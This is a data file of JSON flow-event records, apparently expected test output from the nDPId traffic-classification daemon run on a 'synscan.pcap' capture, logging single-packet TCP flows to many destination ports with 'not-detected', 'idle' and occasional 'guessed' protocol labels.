-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059408,"flow_last_seen":1278275059408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":212,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059408,"flow_last_seen":1278275059408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":212,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2260,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":212,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":212,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2260,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4321,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4321,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30951,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30951,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30951,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30951,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2288,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2288,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2288,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2288,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4343,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4343,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 